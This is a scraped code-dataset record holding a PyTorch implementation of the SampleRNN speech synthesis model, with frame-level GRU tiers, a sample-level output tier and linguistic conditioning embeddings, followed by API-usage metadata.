{"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.use_deterministic_algorithms", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "27697231307", "text": "import numpy as np\nimport torch\nfrom .configuration import SampleRNNConfiguration\nfrom .utils import SampleRNNQuantizer, lecun_uniform, concat_init\nfrom typing import Dict\n\n\nclass FrameLevelSampleRNNModel(torch.nn.Module):\n \"\"\"Frame level module of the SampleRNN architecture\"\"\"\n\n frame_input_samples: int\n frame_ratio: int\n rnn_layers: int\n rnn_hidden_size: int\n conds_size: int\n\n _samples_expand_layer: torch.nn.Conv1d\n _conds_expand_layer: torch.nn.Conv1d\n\n _rnn_layer: torch.nn.GRU\n _rnn_layer_h0: torch.nn.Parameter\n\n _upsampling_layer: torch.nn.ConvTranspose1d\n _upsampling_layer_bias: torch.nn.Parameter\n\n def __init__(self, frame_input_samples: int, frame_ratio: int, rnn_layers: int, rnn_hidden_size: int,\n conds_size: int):\n\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.frame_input_samples = frame_input_samples\n self.frame_ratio = frame_ratio\n self.rnn_layers = rnn_layers\n self.rnn_hidden_size = rnn_hidden_size\n self.conds_size = conds_size\n\n # Create self._samples_expand_layer\n self._samples_expand_layer = torch.nn.Conv1d(\n in_channels=frame_input_samples,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Create self._conds_expand_layer\n self._conds_expand_layer = torch.nn.Conv1d(\n in_channels=conds_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Create self._rnn_layer\n self._rnn_layer = torch.nn.GRU(\n input_size=rnn_hidden_size,\n hidden_size=rnn_hidden_size,\n num_layers=rnn_layers,\n batch_first=True\n )\n\n # Create self._rnn_layer_h0\n self._rnn_layer_h0 = 
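# Illustrative sketch, separate from the scraped records above: the Amazon price
# scraper ends with `while(True): check_price(); time.sleep(60*60*24)` but never
# imports time, so that loop would raise NameError at runtime. A minimal corrected
# polling loop; check_once is a hypothetical stand-in for check_price().
import time

def poll_forever(check_once, interval_seconds=60 * 60 * 24):
    while True:
        check_once()                    # run one price check
        time.sleep(interval_seconds)    # then wait until the next cycle

# poll_forever(lambda: print('checked'), interval_seconds=5)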
torch.nn.Parameter(torch.zeros(rnn_layers, rnn_hidden_size))\n\n # Create self._upsampling_layer\n self._upsampling_layer = torch.nn.ConvTranspose1d(\n in_channels=rnn_hidden_size,\n out_channels=rnn_hidden_size,\n kernel_size=frame_ratio,\n stride=frame_ratio,\n bias=False\n )\n\n # Create self._upsampling_layer_bias\n self._upsampling_layer_bias = torch.nn.Parameter(torch.FloatTensor(rnn_hidden_size, frame_ratio))\n\n # Reset Parameters\n self._upsampling_layer.reset_parameters()\n\n # Initialize learnable parameters\n self._initialize_learnable_parameters()\n self._normalize_learnable_parameters()\n\n def _initialize_learnable_parameters(self):\n \"\"\"Initializes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n torch.nn.init.kaiming_uniform_(self._samples_expand_layer.weight)\n torch.nn.init.constant_(self._samples_expand_layer.bias, 0)\n\n if self.conds_size is not None:\n torch.nn.init.kaiming_uniform_(self._conds_expand_layer.weight)\n torch.nn.init.constant_(self._conds_expand_layer.bias, 0)\n\n torch.nn.init.uniform_(\n self._upsampling_layer.weight,\n -np.sqrt(6 / self.rnn_hidden_size),\n np.sqrt(6 / self.rnn_hidden_size)\n )\n\n torch.nn.init.constant_(self._upsampling_layer_bias, 0)\n\n for i in range(self.rnn_layers):\n concat_init(\n getattr(self._rnn_layer, 'weight_ih_l{}'.format(i)),\n [lecun_uniform, lecun_uniform, lecun_uniform]\n )\n torch.nn.init.constant_(getattr(self._rnn_layer, 'bias_ih_l{}'.format(i)), 0)\n concat_init(\n getattr(self._rnn_layer, 'weight_hh_l{}'.format(i)),\n [lecun_uniform, lecun_uniform, torch.nn.init.orthogonal_]\n )\n torch.nn.init.constant_(getattr(self._rnn_layer, 'bias_hh_l{}'.format(i)), 0)\n\n def _normalize_learnable_parameters(self):\n \"\"\"Normalizes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n self._samples_expand_layer = torch.nn.utils.weight_norm(self._samples_expand_layer)\n\n if self.conds_size is not None:\n self._conds_expand_layer = torch.nn.utils.weight_norm(self._conds_expand_layer)\n\n self._upsampling_layer = torch.nn.utils.weight_norm(self._upsampling_layer)\n\n def forward(self, input_samples, input_conds, upper_tier_conditioning, rnn_hidden_state):\n \"\"\"FrameLevelSampleRNNModel forwarding function of the SampleRNN architecture\n\n Args:\n input_samples (torch.Tensor): matrix of (batch_size, sequence_length, frame_input_samples) containing the sample\n inputs of the sample level module\n upper_tier_conditioning (torch.Tensor): matrix of (batch_size, sequence_length * (prev) frame_ratio, rnn_hidden_size)\n rnn_hidden_state (torch.Tensor): matrix of (rnn_layers, batch_size, rnn_hidden_size)\n\n Returns:\n upsampling_output (torch.Tensor): matrix of (batch_size, sequence_length * frame_ratio, rnn_hidden_size)\n rnn_hidden_state_new (torch.Tensor): matrix of (rnn_layers, batch_size, rnn_hidden_size)\n \"\"\"\n\n # Obtain the batch size\n (batch_size, sequence_length, _) = input_samples.size()\n\n # Check if we have to upscale the conds\n if sequence_length != input_conds.shape[1]:\n upscale_ratio = int(input_samples.shape[1] / input_conds.shape[1])\n input_conds = input_conds.unsqueeze(2) \\\n .expand(batch_size, input_conds.shape[1], upscale_ratio, input_conds.shape[2]) \\\n .reshape(batch_size, sequence_length, input_conds.shape[2])\n\n # samples_expand_output is (batch_size, sequence_length, rnn_hidden_size)\n samples_expand_output = self._samples_expand_layer(input_samples.permute(0, 2, 1)).permute(0, 2, 1)\n conds_expand_output = 
self._conds_expand_layer(input_conds.permute(0, 2, 1)).permute(0, 2, 1)\n\n # Check if the conds are available\n samples_expand_output += conds_expand_output\n\n # Add conditioning if exists\n if upper_tier_conditioning is not None:\n samples_expand_output += upper_tier_conditioning\n\n # Initialize hidden state tensor\n hidden_state_tensor = torch.zeros(self.rnn_layers, batch_size, self.rnn_hidden_size)\n\n # Move it to CUDA, if available\n if input_samples.is_cuda:\n hidden_state_tensor = hidden_state_tensor.cuda()\n\n # Iterate over hidden state list\n for hidden_state_item_index, hidden_state_item in enumerate(rnn_hidden_state):\n\n # If the item is None, initialize it\n if hidden_state_item is None:\n hidden_state_tensor[:, hidden_state_item_index, :] = self._rnn_layer_h0.unsqueeze(1)\n\n # If the item is not None, assign it\n else:\n hidden_state_tensor[:, hidden_state_item_index, :] = hidden_state_item.unsqueeze(1)\n\n # rnn_output is (batch_size, sequence_length, rnn_hidden_size)\n # rnn_hidden_state_new is (rnn_layers, batch_size, rnn_hidden_size)\n (rnn_output, rnn_hidden_state_new) = self._rnn_layer(samples_expand_output, hidden_state_tensor)\n\n # upsampling_bias is (batch_size, self.rnn_hidden_size, sequence_length * self.frame_ratio)\n upsampling_bias = self._upsampling_layer_bias.unsqueeze(0).unsqueeze(2) \\\n .expand(batch_size, self.rnn_hidden_size, sequence_length, self.frame_ratio) \\\n .contiguous().view(batch_size, self.rnn_hidden_size, sequence_length * self.frame_ratio)\n\n # upsampling_output is (batch_size, sequence_length * frame_ratio, rnn_hidden_size)\n upsampling_output = (self._upsampling_layer(rnn_output.permute(0, 2, 1)) + upsampling_bias).permute(0, 2, 1)\n\n # Return the output and the new hidden state\n return upsampling_output, rnn_hidden_state_new\n\n\nclass SampleLevelSampleRNNModel(torch.nn.Module):\n \"\"\"Sample level module of the SampleRNN architecture\"\"\"\n\n # Integer containining the number of samples entering the sample level module\n frame_input_samples: int\n conds_size: int\n rnn_hidden_size: int\n q_levels: int\n\n # Embedding layer used to transform from (batch_size, 1059) to (batch_size, 1059, embedding_dim)\n _embedding_layer: torch.nn.Embedding\n\n _embedding_expand_layer: torch.nn.Conv1d\n _conds_expand_layer: torch.nn.Conv1d\n\n _inputs_comb_layer: torch.nn.Linear\n\n _global_expand_layer: torch.nn.Conv1d\n _adaptation_layer: torch.nn.Conv1d\n _logsoftmax_layer: torch.nn.LogSoftmax\n\n def __init__(self, frame_input_samples: int, conds_size: int, rnn_hidden_size: int, q_levels: int):\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.frame_input_samples = frame_input_samples\n self.conds_size = conds_size\n self.rnn_hidden_size = rnn_hidden_size\n self.q_levels = q_levels\n\n # Create Torch objects\n self._embedding_layer = torch.nn.Embedding(num_embeddings=q_levels, embedding_dim=q_levels)\n\n # lala\n self._embedding_expand_layer = torch.nn.Conv1d(\n in_channels=q_levels,\n out_channels=rnn_hidden_size,\n kernel_size=frame_input_samples, bias=False\n )\n self._conds_expand_layer = torch.nn.Conv1d(\n in_channels=conds_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Lele\n self._inputs_comb_layer = torch.nn.Linear(\n in_features=self.rnn_hidden_size * 3,\n out_features=self.rnn_hidden_size\n )\n\n # Lolo\n self._global_expand_layer = torch.nn.Conv1d(\n in_channels=rnn_hidden_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Lulu\n self._adaptation_layer = 
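# Illustrative sketch, separate from the scraped SampleRNN record above: the
# frame-level tier upsamples its RNN output from one step per frame to frame_ratio
# steps by applying a ConvTranspose1d whose kernel_size and stride both equal
# frame_ratio, so a sequence of length seq_len comes out with length
# seq_len * frame_ratio. The sizes below are arbitrary example values.
import torch

batch_size, seq_len, hidden, frame_ratio = 2, 13, 8, 4
upsample = torch.nn.ConvTranspose1d(hidden, hidden, kernel_size=frame_ratio,
                                    stride=frame_ratio, bias=False)

rnn_output = torch.randn(batch_size, seq_len, hidden)                  # (B, T, H)
upsampled = upsample(rnn_output.permute(0, 2, 1)).permute(0, 2, 1)     # (B, T*ratio, H)
assert upsampled.shape == (batch_size, seq_len * frame_ratio, hidden)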
torch.nn.Conv1d(\n in_channels=rnn_hidden_size,\n out_channels=q_levels,\n kernel_size=1\n )\n\n # Lele\n self._softmax_layer = torch.nn.LogSoftmax(dim=2)\n\n # Initialize learnable parameters\n self._initialize_learnable_parameters()\n self._normalize_learnable_parameters()\n\n def _initialize_learnable_parameters(self):\n \"\"\"Initializes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n torch.nn.init.kaiming_uniform_(self._embedding_expand_layer.weight)\n\n torch.nn.init.kaiming_uniform_(self._global_expand_layer.weight)\n torch.nn.init.constant_(self._global_expand_layer.bias, 0)\n\n lecun_uniform(self._adaptation_layer.weight)\n torch.nn.init.constant_(self._adaptation_layer.bias, 0)\n\n def _normalize_learnable_parameters(self):\n \"\"\"Normalizes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n self._embedding_expand_layer = torch.nn.utils.weight_norm(self._embedding_expand_layer)\n self._global_expand_layer = torch.nn.utils.weight_norm(self._global_expand_layer)\n self._adaptation_layer = torch.nn.utils.weight_norm(self._adaptation_layer)\n\n def forward(self, input_samples, input_conds, upper_tier_conditioning):\n \"\"\"SampleLevelSampleRNNModel forwarding function of the SampleRNN architecture\n\n Args:\n input_samples (torch.Tensor): matrix of (batch_size, 1059) containing the sample inputs of the sample\n level module\n upper_tier_conditioning (torch.Tensor): matrix of (batch_size, sequence_length * frame_size, rnn_hidden_size)\n\n Returns:\n\n \"\"\"\n # Obtain the batch size\n batch_size, _ = input_samples.size()\n\n # Upscale the Conds\n upscale_ratio = int(upper_tier_conditioning.shape[1] / input_conds.shape[1])\n input_conds = input_conds.unsqueeze(2) \\\n .expand(batch_size, input_conds.shape[1], upscale_ratio, input_conds.shape[2]) \\\n .reshape(batch_size, upper_tier_conditioning.shape[1], input_conds.shape[2])\n\n # embedding_output is ()\n embedding_output = self._embedding_layer(input_samples.contiguous().view(-1)) \\\n .view(batch_size, -1, self.q_levels)\n\n # Expand both Samples and Conds\n embedding_expand_output = self._embedding_expand_layer(embedding_output.permute(0, 2, 1))\n conds_expand_output = self._conds_expand_layer(input_conds.permute(0, 2, 1))\n\n # Apply Fully-Connected to Samples, Conds and UpperTier\n inputs_comb_output = self._inputs_comb_layer(torch.cat(\n (embedding_expand_output.permute(0, 2, 1), conds_expand_output.permute(0, 2, 1), upper_tier_conditioning),\n dim=2)\n )\n inputs_comb_output = torch.nn.functional.relu(inputs_comb_output)\n\n # global_expand_output is ()\n global_expand_output = self._global_expand_layer(inputs_comb_output.permute(0, 2, 1))\n global_expand_output = torch.nn.functional.relu(global_expand_output)\n\n # adaptation_output is ()\n adaptation_output = self._adaptation_layer(global_expand_output)\n\n # Apply the LogSoftMax layer and return the result as (batch_size, sequence_length * frame_size, ,q_levels)\n return self._softmax_layer(adaptation_output.permute(0, 2, 1))\n\n\nclass SampleRNNModel(torch.nn.Module):\n \"\"\"General module of the SampleRNN architecture\"\"\"\n\n # Lala\n conf: SampleRNNConfiguration\n quantizer: SampleRNNQuantizer\n\n conds_linguistic_phonemes: torch.nn.Embedding\n conds_linguistic_vowels: torch.nn.Embedding\n conds_linguistic_gpos: torch.nn.Embedding\n conds_linguistic_tobi: torch.nn.Embedding\n\n _conds_adaptation_layer: torch.nn.Linear\n\n frame_level_layers: torch.nn.ModuleList\n sample_level_layer: SampleLevelSampleRNNModel\n\n 
frame_level_hidden_states: Dict\n\n def __init__(self, conf: SampleRNNConfiguration, quantizer: SampleRNNQuantizer, conds_linguistic_n=None):\n\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.conf = conf\n self.quantizer = quantizer\n\n # Initialize parameters for FrameLevelLayers\n self.frame_level_layers = torch.nn.ModuleList()\n self.conds_linguistic_phonemes = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[0],\n embedding_dim=self.conf.conditionants['utterance_linguistic_phonemes_embedding_size']\n )\n self.conds_linguistic_vowels = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[1],\n embedding_dim=self.conf.conditionants['utterance_linguistic_vowels_embedding_size']\n )\n self.conds_linguistic_gpos = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[2],\n embedding_dim=self.conf.conditionants['utterance_linguistic_gpos_embedding_size']\n )\n self.conds_linguistic_tobi = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[3],\n embedding_dim=self.conf.conditionants['utterance_linguistic_tobi_embedding_size']\n )\n\n # Create the Conds Adaptation Layer\n self._conds_adaptation_layer = torch.nn.Linear(\n in_features=self.conf.conditionants['utterance_size_expanded'] + self.conf.conditionants['speaker_size'],\n out_features=self.conf.conditionants['global_size']\n )\n\n # Lala\n for layer_n in range(0, len(self.conf.architecture['frame_layers_fs'])):\n self.frame_level_layers.append(\n FrameLevelSampleRNNModel(\n frame_input_samples=self.conf.architecture['frame_layers_fs'][layer_n],\n frame_ratio=self.conf.architecture['frame_layers_ratios'][layer_n],\n rnn_layers=self.conf.architecture['frame_layers_rnn_layers'][layer_n],\n rnn_hidden_size=self.conf.architecture['frame_layers_rnn_hidden_size'][layer_n],\n conds_size=self.conf.conditionants['global_size']\n )\n )\n\n # Initialize SampleLevelRNN\n self.sample_level_layer = SampleLevelSampleRNNModel(\n frame_input_samples=conf.architecture['frame_layers_ratios'][0],\n conds_size=self.conf.conditionants['global_size'],\n rnn_hidden_size=conf.architecture['frame_layers_rnn_hidden_size'][0],\n q_levels=conf.quantizer['q_levels']\n )\n\n # Initialize Hidden States\n self.frame_level_hidden_states = None\n\n def _get_frame_level_hidden_states(self, frame_level_layer, reset_list):\n\n # Define returned Tensor\n frame_level_layer_hidden_state = []\n\n # Iterate over the batch_size elements\n for reset_index, reset_element in enumerate(reset_list):\n\n # If the element is False, get stored item\n if reset_element == 0:\n frame_level_layer_hidden_state.append(self.frame_level_hidden_states[frame_level_layer][reset_index])\n\n # If the element is True, set None to that element\n elif reset_element == 1:\n frame_level_layer_hidden_state.append(None)\n\n # Return the list\n return frame_level_layer_hidden_state\n\n def _set_frame_level_hidden_states(self, new_hidden_state_tensor, frame_level_layer: FrameLevelSampleRNNModel,\n reset_list):\n\n # Create aux var\n last_hidden_state = 0\n\n # Iterate over the batch_size elements\n for reset_index, reset_element in enumerate(reset_list):\n\n # Assign only if reset_element == 1 or 0\n if reset_element == 0 or reset_element == 1:\n self.frame_level_hidden_states[frame_level_layer][reset_index] = \\\n new_hidden_state_tensor[:, last_hidden_state, :]\n last_hidden_state += 1\n else:\n self.frame_level_hidden_states[frame_level_layer][reset_index] = None\n\n def _format_linguistic_features(self, input_conds):\n # Create aux conds Tensor\n 
input_conds_aux = torch.zeros(\n (input_conds.shape[0], input_conds.shape[1], self.conf.conditionants['utterance_size_expanded'])\n )\n\n # Shorcuts for embedding sizes\n phonemes_size = self.conf.conditionants['utterance_linguistic_phonemes_embedding_size']\n vowels_size = self.conf.conditionants['utterance_linguistic_vowels_embedding_size']\n gpos_size = self.conf.conditionants['utterance_linguistic_gpos_embedding_size']\n tobi_size = self.conf.conditionants['utterance_linguistic_tobi_embedding_size']\n\n # Define aux variable\n last_index = 0\n\n # Append CATEGORICAL features at the beginning\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 2].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 3].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 4].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 5].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 6].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + vowels_size] = self.conds_linguistic_vowels(\n input_conds[:, :, 27].long())\n last_index += vowels_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 31].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 33].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 41].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + tobi_size] = self.conds_linguistic_tobi(\n input_conds[:, :, 49].long())\n last_index += tobi_size\n\n # Append REAL and BOOL features after the embeddings\n input_conds_aux[:, :, last_index:last_index + 2] = input_conds[:, :, 0:2]\n last_index += 2\n\n input_conds_aux[:, :, last_index:last_index + 20] = input_conds[:, :, 7:27]\n last_index += 20\n\n input_conds_aux[:, :, last_index:last_index + 3] = input_conds[:, :, 28:31]\n last_index += 3\n\n input_conds_aux[:, :, last_index:last_index + 1] = input_conds[:, :, 32:33]\n last_index += 1\n\n input_conds_aux[:, :, last_index:last_index + 7] = input_conds[:, :, 34:41]\n last_index += 7\n\n input_conds_aux[:, :, last_index:last_index + 7] = input_conds[:, :, 42:49]\n last_index += 7\n\n input_conds_aux[:, :, last_index:] = input_conds[:, :, 50:]\n\n # Move to CUDA if required\n if input_conds.is_cuda:\n input_conds_aux = input_conds_aux.cuda()\n\n # Return it\n return input_conds_aux\n\n def forward(self, utterance_samples, speaker_conds, utterance_conds, utterances_reset):\n\n # Get basic Parameters\n batch_size, time_steps, _ = utterance_conds.shape\n\n # Initialize Hidden States Dict\n if self.frame_level_hidden_states is None:\n self.frame_level_hidden_states = {\n rnn: [None] * utterance_conds.shape[0] for rnn in self.frame_level_layers\n }\n\n # Check that there are valid samples to propagate\n if not any(utterances_reset != 2):\n return_tensor = torch.zeros(\n utterance_samples.shape[0],\n 
self.conf.architecture['receptive_field'],\n self.quantizer.q_levels\n )\n if utterance_samples.is_cuda:\n return_tensor = return_tensor.cuda()\n return return_tensor\n\n # Clean the inputs\n else:\n utterance_samples = utterance_samples[utterances_reset != 2] if utterance_samples is not None else None\n utterance_conds = utterance_conds[utterances_reset != 2]\n speaker_conds = speaker_conds[utterances_reset != 2]\n\n # Check if we are dealing with linguistic conditionants to apply the embeddings\n if self.conf.conditionants['utterance_type'] in ['linguistic', 'linguistic_lf0']:\n utterance_conds = self._format_linguistic_features(utterance_conds)\n\n # Prepare Conds\n speaker_conds = speaker_conds.unsqueeze(1).expand(utterance_conds.shape[0], time_steps, -1)\n\n # Apply Linear transformation to the input conds\n input_conds = self._conds_adaptation_layer(torch.cat((utterance_conds, speaker_conds), dim=2))\n\n # Training Mode\n if self.training:\n\n # Create holder of the result\n return_tensor = torch.zeros(batch_size, self.conf.architecture['receptive_field'], self.quantizer.q_levels)\n\n # Move to CUDA if required\n if utterance_samples.is_cuda:\n return_tensor = return_tensor.cuda()\n\n # Get the model output\n model_output = self.do_train(\n input_samples=utterance_samples,\n input_conds=input_conds,\n utterances_reset=utterances_reset\n )\n\n # Store the result in the appropiate positions\n last_index = 0\n for reset_index, reset_item in enumerate(utterances_reset):\n if reset_item != 2:\n return_tensor[reset_index, :, :] = model_output[last_index, :, :]\n last_index += 1\n\n # Return the torch.Tensor\n return return_tensor\n\n # Inference Mode\n else:\n\n # Create holder of the result\n return_tensor = torch.zeros(batch_size, self.conf.architecture['frame_size'] + time_steps *\n self.conf.architecture['frame_size'])\n\n # Move to CUDA if required\n if utterance_conds.is_cuda:\n return_tensor = return_tensor.cuda()\n\n # Get the model output\n model_output = self.do_infer(\n utterances_conds=input_conds,\n utterances_reset=utterances_reset\n )\n\n # Store the result in the appropiate positions\n last_index = 0\n for reset_index, reset_item in enumerate(utterances_reset):\n if reset_item != 2:\n return_tensor[reset_index, :] = model_output[last_index, :]\n last_index += 1\n\n # Return the torch.Tensor\n return return_tensor\n\n def do_train(self, input_samples, input_conds, utterances_reset):\n\n # Get batch_size\n (batch_size, _) = input_samples.size()\n\n # Initialize upper level conditioners\n upper_tier_conditioning = None\n\n # Iterate over the list of sample level layers\n for frame_level_layer in reversed(self.frame_level_layers):\n # Compute samples to pass in current frame level layer\n from_index = self.frame_level_layers[-1].frame_input_samples - frame_level_layer.frame_input_samples\n to_index = -frame_level_layer.frame_input_samples + 1\n\n # Quantize the samples\n frame_layer_input_samples = self.quantizer.dequantize(input_samples[:, from_index: to_index])\n\n # Reshape samples to (batch_size, seq_len, frame_level_fs)\n frame_layer_input_samples = frame_layer_input_samples.contiguous() \\\n .view(batch_size, -1, frame_level_layer.frame_input_samples)\n\n # Get next frame level hidden state\n frame_level_hidden_state = self._get_frame_level_hidden_states(\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Propagate through current frame level layer\n (upper_tier_conditioning, new_hidden) = frame_level_layer(\n 
input_samples=frame_layer_input_samples,\n input_conds=input_conds,\n upper_tier_conditioning=upper_tier_conditioning,\n rnn_hidden_state=frame_level_hidden_state\n )\n\n # Store new hidden state in the dictionary\n self._set_frame_level_hidden_states(new_hidden.detach(), frame_level_layer, utterances_reset)\n\n # Get sample level input\n sample_layer_input_samples = input_samples[:, (self.frame_level_layers[-1].frame_input_samples -\n self.sample_level_layer.frame_input_samples):]\n\n # Propagate through sample level layer and return the result\n return self.sample_level_layer(\n input_samples=sample_layer_input_samples,\n input_conds=input_conds,\n upper_tier_conditioning=upper_tier_conditioning\n )\n\n def do_infer(self, utterances_conds, utterances_reset):\n # Get batch_size\n (batch_size, num_portions, conds_size) = utterances_conds.size()\n\n # Create a Tensor to store the generated samples in\n generated_sequences = torch.zeros(\n batch_size,\n self.conf.architecture['frame_size'] + num_portions * self.conf.architecture['frame_size'],\n dtype=torch.int64\n ).fill_(self.quantizer.quantize_zero())\n\n # Move to CUDA\n if utterances_conds.is_cuda:\n generated_sequences = generated_sequences.cuda()\n\n # Create a list to store the conditioning\n frame_level_outputs = [None for _ in self.frame_level_layers]\n\n # Iterate over the samples\n for generated_sample in range(self.conf.architecture['frame_size'], generated_sequences.shape[1]):\n # Compute conds index\n conds_indx, _ = divmod(generated_sample, self.conf.architecture['frame_size'])\n conds_indx -= 1\n\n # On\n if generated_sample == self.conf.architecture['frame_size'] + 1:\n utterances_reset[utterances_reset == 1] = 0\n\n # Iterate over Frame Level layers\n for (frame_level_indx, frame_level_layer) in reversed(list(enumerate(self.frame_level_layers))):\n\n # If the generated sample is not a multiple of the input size, skip\n if generated_sample % frame_level_layer.frame_input_samples != 0:\n continue\n\n # Prepare the input samples to enter the model\n frame_layer_input_samples = torch.autograd.Variable(self.quantizer.dequantize(\n generated_sequences[:, generated_sample - frame_level_layer.frame_input_samples:generated_sample]\n ).unsqueeze(1))\n\n # Mode the variable to CUDA, if available\n if utterances_conds.is_cuda:\n frame_layer_input_samples = frame_layer_input_samples.cuda()\n\n # Check if we have conditioning\n if frame_level_indx == len(self.frame_level_layers) - 1:\n upper_tier_conditioning = None\n\n # If we are not in the last tier\n else:\n\n # Compute frame_index\n frame_index = (generated_sample // frame_level_layer.frame_input_samples) % \\\n self.frame_level_layers[frame_level_indx + 1].frame_ratio\n\n # Get the upper tier conditioning from the previous upper tier\n upper_tier_conditioning = frame_level_outputs[frame_level_indx + 1][:, frame_index, :] \\\n .unsqueeze(1)\n\n # Set the new hidden states\n frame_level_hidden_state = self._get_frame_level_hidden_states(\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Propagate through current frame level layer\n frame_level_outputs[frame_level_indx], new_frame_level_hiddden_state = \\\n frame_level_layer(\n input_samples=frame_layer_input_samples,\n input_conds=utterances_conds[:, conds_indx, :].unsqueeze(1),\n upper_tier_conditioning=upper_tier_conditioning,\n rnn_hidden_state=frame_level_hidden_state\n )\n\n # Set the new frame level hidden state\n self._set_frame_level_hidden_states(\n 
new_hidden_state_tensor=new_frame_level_hiddden_state.detach(),\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Prepare the input samples Sample Level Layer\n sample_layer_input_samples = \\\n generated_sequences[:, generated_sample - self.sample_level_layer.frame_input_samples:generated_sample]\n\n # Mode the variable to CUDA, if available\n if utterances_conds.is_cuda:\n sample_layer_input_samples = sample_layer_input_samples.cuda()\n\n # Prepare conditioning\n upper_tier_conditioning = frame_level_outputs[0][:, generated_sample % self.sample_level_layer\n .frame_input_samples, :].unsqueeze(1)\n\n # Store generated samples\n generated_sequences[:, generated_sample] = self.sample_level_layer(\n input_samples=sample_layer_input_samples,\n input_conds=utterances_conds[:, conds_indx, :].unsqueeze(1),\n upper_tier_conditioning=upper_tier_conditioning\n ).squeeze(1).exp_().multinomial(1).squeeze(1)\n\n # Return generated samples\n return generated_sequences\n", "repo_name": "entn-at/samplernn_pytorch", "sub_path": "samplernn/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 32039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.nn.GRU", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn.ConvTranspose1d", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.nn.init.uniform_", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", 
